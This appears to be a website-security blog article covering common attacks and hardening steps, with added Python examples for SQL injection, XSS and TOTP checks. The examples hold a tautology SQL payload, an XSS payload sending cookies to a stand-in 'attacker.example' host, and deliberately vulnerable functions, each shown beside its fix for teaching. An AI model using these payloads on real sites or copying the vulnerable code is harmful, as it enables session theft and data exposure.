XPERTERIA

Website security

Website security is the top priority after creating a website. Whether you run a small business or enterprise, users expect a safe online experience. When customers use an online credit card payment processor, they need to know their data is safe. Visitors do not want their personal information to fall into the wrong hands.

You may not think your site has anything worth being hacked for, but websites are compromised all the time. Many compromises are not aimed at your data or your page layout at all: the attacker wants your server, typically to relay spam, to host phishing pages, or to serve illegal files from a web server they stand up on your machine.

Other very common uses for a compromised machine are enrolling it in a botnet or using it to mine cryptocurrency, and you could also be hit by ransomware. Much of this is done by automated scripts that scan the internet for known vulnerabilities in common software, so a site gets attacked because it is reachable, not because it is interesting. Here are some top tips to keep your website secure.

What is website security?

Website security is the measures taken to secure a website from cyberattacks. In this sense, website security is an ongoing process and an essential part of managing a website. It is the protection of your site from malicious online attackers that can access, alter and steal your site’s content and data. It should also protect the personal data and privacy of your site’s users.

When it comes to creating a website, you need to trust that your site and its data are secure. Cyber attacks are on the rise and growing increasingly sophisticated, which makes them difficult for security professionals to spot, let alone website creators. The right website builder will prioritize security, so you can focus on your business.

Why is website security important?

Website security is important because nobody wants to have a hacked website. Having a secure website is as vital to someone’s online presence as having a website host. If a website is hacked and blocklisted, for example, it loses up to 98% of its traffic. Not having a secure website can be as bad as not having a website at all or even worse.

What does website security include?

Website security involves the right procedures, the right people, as well as the right tools and applications. It often goes beyond just the website and includes web host/web server (for example, Apache/IIS/Nginx) and hosting provider security as well.

Impact of website security breaches

Cyber attacks can have significant, lasting effects on the functionality and performance of your site. In the short term, they can limit traffic growth and conversions. In the long term, they can damage your brand identity and business reputation. Some of the most significant impacts of security breaches include:

1. Customer churn

Users need to know their data is safe in order to trust and use your website, and come back as repeating customers. It is important users trust your site, in order to click on a CTA, or make a purchase. Malicious attacks which lead to the loss of customer’s credentials and sensitive information will undoubtedly affect how your site and business are perceived. This will unfortunately have consequences beyond just your website, affecting your brand reputation and customer service as well.

2. Search engine blocklisting

Search engine blocklisting can be a very harmful consequence of a site security breach. If Google crawls a website and finds malware or malicious code, it may blocklist the affected site: the site is flagged in search results and browsers show a warning page before visitors reach it. This leads to dramatic traffic drops and hurts a site’s ability to attract and retain customers.

Likewise, websites that suffer from regular downtime and server errors often experience indexing issues. If Google repeatedly receives a server error (a 5xx response, such as 500 or 503) for a page, it slows its crawling of the site and can eventually drop the page from its index. This has a dramatic impact on a site’s visibility in search and on its ability to attract new visitors.

3. Site suspension

Security attacks can suspend crucial site services, such as login, signups and shopping functions. Consequently, this can make it difficult for users to interact with your site. Since malware is costly to remove and time consuming to fix, it’s much better to pre-empt security attacks with a strong website security plan, than to deal with their aftermath.

Is an SSL certificate enough?

Many businesses think that installing an SSL/TLS certificate for their domain name is enough to guarantee cybersecurity. While it is important, it is definitely not enough:

  • A TLS certificate, on a correctly configured HTTPS server, protects the traffic between the browser and your web server: an attacker on the network cannot read or tamper with it. That protection covers only the connection, and only when HTTP is redirected to HTTPS and HSTS is enabled, otherwise a visitor’s first plain-HTTP request can still be intercepted.
  • A TLS certificate will not stop cybercriminals from exploiting a vulnerability in your website code or in your web server configuration. An attack delivered over HTTPS is simply an encrypted attack.

Most hacked websites are caused by security vulnerabilities in website code and in web server configuration.

Are strong passwords enough?

Strong passwords help you protect your sensitive areas – those that require you to log in to access functionality or information that should not be publicly available. A strong password helps you avoid both brute force and dictionary attacks. 

However, most users have misconceptions about what a strong password is: length and uniqueness (no reuse across sites) matter far more than special characters or forced periodic changes. Strong passwords are an important element of security in general, not just website security, but on their own they do little against the most common web compromises, which exploit vulnerable software, phish the credentials outright, or reuse credentials leaked from another site’s breach.

Website attack example

There are a number of ways in which a site’s security may be breached. We’re going to explain some of the most frequently occurring ones and the potential threats they pose to your site here:

1. SQL injections

SQL injection occurs when user-supplied input is concatenated into a database query written in SQL (Structured Query Language) without being separated from the query itself, so text the attacker submits is executed as part of the query. It can be used to read, modify or delete information within a database, bypass logins, and retrieve password hashes or other user information. According to Akamai’s State of the Internet/Security Report, there were 6.2 billion attempted SQL injections between January 2020 and June 2021, placing them at the top of most common web attacks.

SQL injection poses a real threat to keeping both your site and its data safe. These attacks can impact your site’s functionality and lead to the loss of sensitive user data. For example, password hashes retrieved from your database can be cracked offline and then used to hack your users’ accounts across multiple online platforms.
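As an added example (not code from the original article), here is the flaw in miniature in Python with an in-memory SQLite database: a user lookup that concatenates the username into the query, beside the same lookup using a bound parameter. The table, the two users, their placeholder hashes and the payload are all constructed for the demo.

```python
import sqlite3


# Constructed demo data: two users with placeholder (non-secret) password hashes.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, pw_hash) VALUES (?, ?)",
        [("alice", "hash-of-alice-password"), ("bob", "hash-of-bob-password")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # VULNERABLE: the caller-supplied string becomes part of the SQL text,
    # so quotes and keywords inside it are parsed as SQL, not treated as data.
    query = f"SELECT username, pw_hash FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    # SAFE: the ? placeholder is bound by the driver; the value is never
    # interpreted as SQL, whatever characters it contains.
    return conn.execute(
        "SELECT username, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchall()


# Classic tautology payload: closes the quoted literal and appends an
# always-true clause, turning "find this user" into "return every user".
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, PAYLOAD))  # every row, hashes included
    print("safe:      ", find_user_safe(db, PAYLOAD))        # no user has that name: []
```

The vulnerable query becomes `SELECT ... WHERE username = '' OR '1'='1'` and dumps the whole table; the parameterized version looks for a user literally named `' OR '1'='1` and finds nothing. Parameterized queries (or an ORM that uses them) are the fix; escaping by hand is not.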

2. Ransomware

Ransomware is malicious software that, once executed on a system, encrypts files or otherwise blocks access to systems, software and applications. The attackers then demand a ransom for the decryption key. Paying does not guarantee that the data is recovered, and many ransomware groups also copy the data before encrypting it and threaten to publish it.

In 2021 organizations, from public hospitals to government bodies, to large corporations, were victims of ransomware attacks. The majority of these ransomware attacks were the result of phishing— computers and systems became infected when employees received a phishing email and then clicked on a malicious link within it.

Ransomware attacks are on the rise, and 2021 was a particularly busy year, with 37% of corporate organizations reporting that they had been the victims of a ransomware attack. In the first half of 2021 alone, the FBI reported a 62% year-on-year increase in such attacks.

3. Cross-site scripting (XSS)

A cross-site scripting attack occurs when attacker-controlled input is placed into a page served by a trusted website without proper output encoding, so the victim’s browser runs it as JavaScript. Like SQL injection, it is an injection flaw: the browser cannot tell the site’s own markup from text a user submitted, and simply renders whatever it receives, regardless of its intent.

Cross-site scripting is often used to steal a user’s session cookies and impersonate them on the site. It can also be used to alter page content, or to capture user credentials (e.g. passwords or credit card numbers) through injected forms or keystroke logging. Between January 2020 and June 2021, there were an estimated 1.019 billion such attacks, so it goes without saying that protecting against cross-site scripting is an important part of website security.
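The following is an added example in Python, not code from the original article: a comment is rendered into HTML once without encoding and once with context-appropriate encoding, plus a link renderer that handles the attribute context. The payload (which would send the visitor’s cookies to a hypothetical `attacker.example` host) and the sample inputs are constructed for the demo.

```python
import html
import urllib.parse

# Constructed payload of the kind described above: exfiltrates the victim's cookies.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(comment: str) -> str:
    # VULNERABLE: user text is dropped into the page as-is, so any tags it
    # contains become part of the document and any <script> in it runs.
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    # SAFE for element-content context: encode & < > " ' so the browser
    # displays the text instead of parsing it as markup.
    return f'<p class="comment">{html.escape(comment)}</p>'


def render_link_safe(url: str, label: str) -> str:
    # Attribute context: quote the attribute and escape its value, and refuse
    # schemes other than http(s) so a "javascript:" URL cannot run on click.
    scheme = urllib.parse.urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))  # script tag survives intact
    print(render_comment_safe(PAYLOAD))        # &lt;script&gt;...&lt;/script&gt;
    print(render_link_safe("javascript:alert(document.cookie)", "click"))
```

Encoding must match the context the data lands in (HTML body, attribute, URL, or inline JavaScript each need different treatment), which is why a templating engine with auto-escaping is preferable to hand-built strings. A Content-Security-Policy header that forbids inline script is a second layer that limits the damage when an encoding bug slips through.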

4. Credential reuse

When user credentials are stolen, it can impact more than just your website. They can be used to access multiple sites where the same credentials apply and create damage that extends across many websites at once.

Credential reuse attacks, usually automated as credential stuffing (replaying username and password pairs from one breach against many other sites), are one of the most common threats to site security, because users routinely reuse the same credentials across sites and platforms. Compromising just one of those sites therefore opens far more than the site the credentials were stolen from.

5. DoS/DDoS attacks

DoS (denial of service) attacks aim to interrupt the functionality and availability of a website. The most common form is a “distributed denial of service” (DDoS) attack, in which a botnet of compromised machines sends huge volumes of traffic from many sources at once to overwhelm the server or its network link.

DoS attacks exhaust the server’s capacity, so requests time out and the attacked website becomes inaccessible. This can be incredibly harmful for websites of all sizes, and mitigation usually has to happen upstream of the server, at the hosting provider or a DDoS protection service, since a single server cannot absorb the traffic on its own.

Steps to improve your website security

Making sure your site is secure starts with choosing the right website builder. Opt for one that prioritizes website security, leaving you free to focus on managing your site. Here’s a run down of some of the steps both you, and your website builder should take to protect your site:

1. Core platform and 3rd party updates

Despite the known risks from cyber attacks, your site’s security should be something you can take for granted. This might sound counterintuitive, but hear us out.

Building your website on a platform that’s monitored 24/7 means complete peace of mind when it comes to the security of your site, and by extension—your business. A platform that scans for vulnerabilities and makes updates in response to these is ahead of the game when it comes to securing your site.

Third party apps can be a major source of site security breaches, with the potential to harm millions of sites at once. To avoid this happening, we recommend choosing a website builder that contains as many built-in features as you need to run your business. Leaving you less dependent on third party apps, and more focused on your business.

2. SSL/TLS protocols

A secure website serves its pages over HTTPS, which you can spot by the https:// at the front of a URL. HTTPS uses TLS (Transport Layer Security), the successor to SSL (Secure Sockets Layer); the name SSL has stuck, but every SSL version is long deprecated. TLS encrypts and authenticates the communication between the browser and the server, which prevents attackers on the network from reading or altering what passes between them. HTTPS should be standard on any new site, and is essential on any site handling logins, payments or personal data. The protocol is revised as attacks are found: TLS 1.0 and 1.1 were formally deprecated in 2021, and TLS 1.3 removed the weak cipher suites and key exchanges that earlier versions still allowed.

A good website builder or host will create every site with HTTPS enabled by default, offering TLS 1.2 and TLS 1.3 and refusing older versions. You can create and manage any type of site you need, from a personal website to an ecommerce site, and rest assured that your data, and that of your customers, is protected in line with current industry standards.

3. Secure web hosting

There are many layers of protection necessary to secure a site, and reliable web hosting is an integral part of this. Secure hosting reduces the attack surface your site inherits from the server beneath it: a patched operating system and web server, isolation between customers on shared hosts, and DDoS protection in front of your site. It’s also important that your hosting is screened regularly to ensure it’s prepared for any threats, including DDoS, that come its way.

Ideally, secure hosting should involve continual testing and 24/7 monitoring to guarantee it can withstand even the most advanced cyber threats. It should also be GDPR compliant and adhere to international standards regarding online privacy and security.

4. Established admin privileges

Large sites especially need a team of people to manage them, and each will require varying degrees of access. Make sure to think carefully about just how much access a website manager needs to do their job, then award admin access to your site accordingly. Blindly granting full access to everyone who works on your site will leave it more vulnerable to attacks.

We also recommend writing a security policy that applies to all site admins. This should include: choosing a password, third party app downloads, and other important site management tasks to make sure your entire team has your site’s security as their number one priority.

5. Site backup

While the best website security methods involve pre-empting attacks, in the event of a security breach quick recovery will depend on your site being backed up. This means saving a version of your site separately, off the web server itself (an attacker who controls the server can delete any backups kept on it), and confirming that it can actually be restored should the original be attacked in any way.

Many website builders automatically back up all their sites. You don’t need to do anything, but rest assured that your site is saved. If you’re not sure that your site is automatically backed up, we recommend checking with your website builder or your site developer from the get-go, and asking how far back the backups go and how a restore is triggered.

6. Change default CMS settings

Your site is easier to hack if your default CMS (content management system) settings haven’t been changed. Make sure to review these when building your site. For example, start with comment and user settings: disable open registration if you don’t need it, moderate or disable comments, remove or rename the default administrator account, and assign each of your site’s admins the least privileged role that covers their job.

Changing these defaults removes the low-hanging fruit that automated attacks rely on. An increasing share of attacks are carried out by bots that probe for the default account names, default paths and default settings of popular CMS platforms, and any site still running on those defaults is compromised with no human effort at all.

7. Follow password best practices

Use strong passwords to protect against credential attacks: length matters most (a long passphrase beats a short string of symbols), every account should have its own password, and a password manager makes both practical. Change a password when you have reason to think it has been exposed rather than on a fixed schedule, since forced rotation mostly produces predictable variations of the old one. Never share your password, and make sure everyone who has access to your site knows how to keep their login credentials safe.

It’s also highly recommended to set up multi-factor authentication (MFA). This makes it much more difficult for an attacker who has obtained a password to get in. MFA adds a second step to login, such as a code from an authenticator app, a push notification to a mobile device, or a hardware security key. Hardware keys (FIDO2/WebAuthn) are the strongest option because they cannot be phished; if you use push notifications, treat any prompt you did not initiate as an attack in progress, not as a glitch.
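To show what the second factor actually checks, here is an added example (not code from the original article) of the time-based one-time password (TOTP) scheme that authenticator apps implement, in Python from the standard library only. It uses the published RFC 4226/RFC 6238 test secret so the outputs can be checked against the RFCs; a real enrolment generates a random secret per user. The `last_counter` replay check and the skew window are the two details the RFC leaves to the server implementer.

```python
import hashlib
import hmac
import struct
from typing import Optional

# RFC 4226 / RFC 6238 test secret (ASCII "12345678901234567890"). In production
# each user gets a random secret, shown once as a QR code and stored server-side.
RFC_TEST_SECRET = b"12345678901234567890"
STEP = 30  # seconds each code stays valid


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    # HMAC-SHA1 over the big-endian 8-byte counter, then RFC 4226 dynamic
    # truncation: the low nibble of the last byte picks 4 bytes to keep.
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, digits: int = 6) -> str:
    # TOTP is HOTP with the counter derived from the clock, so the phone and
    # the server agree without ever talking to each other.
    return hotp(secret, unix_time // STEP, digits)


def verify_totp(secret: bytes, submitted: str, unix_time: int,
                last_counter: int = -1, window: int = 1) -> Optional[int]:
    """Return the matching time-step counter, or None if the code is rejected.

    Accepts the current step and +/- `window` steps to tolerate clock skew,
    refuses any counter at or before `last_counter` so a code that was already
    used cannot be replayed, and compares in constant time.
    """
    current = unix_time // STEP
    for counter in range(current - window, current + window + 1):
        if counter <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, counter), submitted):
            return counter
    return None


if __name__ == "__main__":
    print(totp(RFC_TEST_SECRET, 59))            # RFC 6238 vector: 287082
    print(verify_totp(RFC_TEST_SECRET, "287082", 59))            # 1 (accepted)
    print(verify_totp(RFC_TEST_SECRET, "287082", 59, last_counter=1))  # None (replay)
```

The server must store the counter returned by `verify_totp` and pass it back as `last_counter` on the next attempt; without that, a code captured by a phishing page stays valid for the whole window. TOTP is still phishable in real time, which is why the text above prefers hardware keys where the stakes justify them.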

8. Get website security tools

Once you think you have done all you can, it’s time to test your website security. The most effective way of doing this is with website security tools: automated vulnerability scanners first, and, for sites that warrant it, a manual penetration test (pen test for short) in which a tester tries to chain and exploit what the scanners find.

There are many commercial and free products to assist you with this. They work on a similar basis to automated attackers in that they try known exploits and attempt to compromise your site using some of the previously mentioned methods such as SQL injection and XSS. Some free tools that are worth looking at:

  • Netsparker (now Invicti; free community edition and trial version available). Good for testing SQL injection and XSS.
  • OpenVAS claims to be the most advanced open source security scanner. Good for testing known vulnerabilities, with tens of thousands of vulnerability tests, but it can be difficult to set up and requires an OpenVAS server, which only runs on *nix. OpenVAS is a fork of Nessus from before Nessus became a closed-source commercial product.
  • SecurityHeaders.io (free online check). A tool that quickly reports which HTTP security headers, such as Content-Security-Policy (CSP) and Strict-Transport-Security (HSTS), a domain has enabled and correctly configured.
  • Xenotix XSS Exploit Framework A tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site’s inputs are vulnerable in Chrome, Firefox and IE.

The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical and high-severity issues first, and to confirm each finding before acting on it, since scanners report false positives. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the medium/low issues aren’t a concern for your site.

Final thoughts

As a business owner and webmaster, you cannot merely set up a website and forget it. Although website creation is easier than ever, it does not change the fact that security maintenance is necessary.

Always be proactive when it comes to protecting your company’s and customers’ data. Whether your site takes online payments or personal information, the data visitors enter into your site must land in the right hands. Securing your site and learning how to protect against attackers is a big part of keeping your site healthy and safe in the long run.